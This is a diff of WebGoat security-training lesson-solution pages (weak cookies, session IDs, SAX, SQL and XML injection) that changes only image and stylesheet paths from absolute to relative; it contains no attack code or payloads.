field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -713,9 +713,9 @@ with webgoat/webgoat.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_598"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg" v:shapes="Picture_x0020_598"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image021.jpg" v:shapes="Picture_x0020_598"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -735,9 +735,9 @@ using this cookie and not with parameters like above.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_599" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg" v:shapes="Picture_x0020_599"><![endif]></span><span
src="lesson_solutions/WeakAuthenticationCookie_files/image022.jpg" v:shapes="Picture_x0020_599"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -752,9 +752,9 @@ aspect/aspect.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_600"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg" v:shapes="Picture_x0020_600"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image023.jpg" v:shapes="Picture_x0020_600"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -769,9 +769,9 @@ field-end'></span><![endif]--> Logon as aspect/aspect<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_601"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg" v:shapes="Picture_x0020_601"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image024.jpg" v:shapes="Picture_x0020_601"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -791,9 +791,9 @@ to see the new cookie.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_602"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg" v:shapes="Picture_x0020_602"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image025.jpg" v:shapes="Picture_x0020_602"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -865,9 +865,9 @@ existing cookie JSESSIONID.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_603"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg" v:shapes="Picture_x0020_603"><![endif]></span></p>
src="lesson_solutions/WeakAuthenticationCookie_files/image026.jpg" v:shapes="Picture_x0020_603"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -882,9 +882,9 @@ field-end'></span><![endif]--> Add AuthCookie to request<span style='font-family
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_604"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakAuthenticationCookie_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg" v:shapes="Picture_x0020_604"><![endif]></span><span
src="lesson_solutions/WeakAuthenticationCookie_files/image027.jpg" v:shapes="Picture_x0020_604"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span

48
webgoat/main/project/WebContent/lesson_solutions/WeakSessionID.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakSessionID_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -647,9 +647,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -674,9 +674,9 @@ request from the "Previous requests" drop-down box.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -697,9 +697,9 @@ button on the bottom of the screen. A pop-up window must be shown like below.<o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -730,9 +730,9 @@ the button "Fetch". You will not see any information about progress.<o:p></o:p><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="/WebGoat/lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -746,9 +746,9 @@ to go to the tab "Analysis".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="/WebGoat/lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -760,9 +760,9 @@ pane you see nothing. <o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
@ -774,9 +774,9 @@ select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></s
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -803,9 +803,9 @@ You can download Crowbar for free: <a href="http://www.sensepost.com/research/cr
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="/WebGoat/lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -819,9 +819,9 @@ request in Crowbar:<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="/WebGoat/lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -858,9 +858,9 @@ reply".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="/WebGoat/lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

28
webgoat/main/project/WebContent/lesson_solutions/WsSAXInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSAXInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSAXInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WsSAXInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSAXInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WsSAXInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WsSAXInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -663,9 +663,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_39" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image002.jpg" v:shapes="Picture_x0020_39"><![endif]></span><span
src="lesson_solutions/WsSAXInjection_files/image002.jpg" v:shapes="Picture_x0020_39"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><span
style='mso-spacerun:yes'> </span><o:p></o:p></span></p>
@ -831,9 +831,9 @@ style='font-family:"Arial","sans-serif"'>Enter a password 'test' and click
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_40" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image004.jpg" v:shapes="Picture_x0020_40"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image004.jpg" v:shapes="Picture_x0020_40"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -854,9 +854,9 @@ style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_41" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;
height:345pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image006.jpg" v:shapes="Picture_x0020_41"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image006.jpg" v:shapes="Picture_x0020_41"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -870,9 +870,9 @@ style='mso-element:field-end'></span><![endif]--> Intercept request</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;height:345pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image008.jpg" v:shapes="Picture_x0020_42"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image008.jpg" v:shapes="Picture_x0020_42"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span
@ -886,9 +886,9 @@ style='mso-element:field-end'></span><![endif]--> Inject XML payload</p>
style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_43"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSAXInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSAXInjection_files/image010.jpg" v:shapes="Picture_x0020_43"><![endif]></span></p>
src="lesson_solutions/WsSAXInjection_files/image010.jpg" v:shapes="Picture_x0020_43"><![endif]></span></p>
<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
<!--[if supportFields]><span style='mso-element:field-begin'></span><span

24
webgoat/main/project/WebContent/lesson_solutions/WsSqlInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WsSqlInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSqlInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/WsSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WsSqlInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/WsSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WsSqlInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -654,9 +654,9 @@ see a history of invoked web services or WSDL files.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_31" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image002.jpg" v:shapes="Picture_x0020_31"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image002.jpg" v:shapes="Picture_x0020_31"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -685,9 +685,9 @@ If the pop-up does not appear you have to go to "Tools" > "Credentials". There y
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_32"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:314.25pt;height:156pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=419 height=208
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image004.jpg" v:shapes="Picture_x0020_32"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image004.jpg" v:shapes="Picture_x0020_32"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -702,9 +702,9 @@ field-end'></span><![endif]--> Basic authentication<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_33"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:275.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=367
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image006.jpg" v:shapes="Picture_x0020_33"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image006.jpg" v:shapes="Picture_x0020_33"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -730,9 +730,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_34"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:275.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/WsSqlInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=367
src="/WebGoat/lesson_solutions/WsSqlInjection_files/image008.jpg" v:shapes="Picture_x0020_34"><![endif]></span></p>
src="lesson_solutions/WsSqlInjection_files/image008.jpg" v:shapes="Picture_x0020_34"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

40
webgoat/main/project/WebContent/lesson_solutions/XMLInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/XMLInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XMLInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/XMLInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/XMLInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/XMLInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XMLInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/XMLInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/XMLInjection_files/colorschememapping.xml">
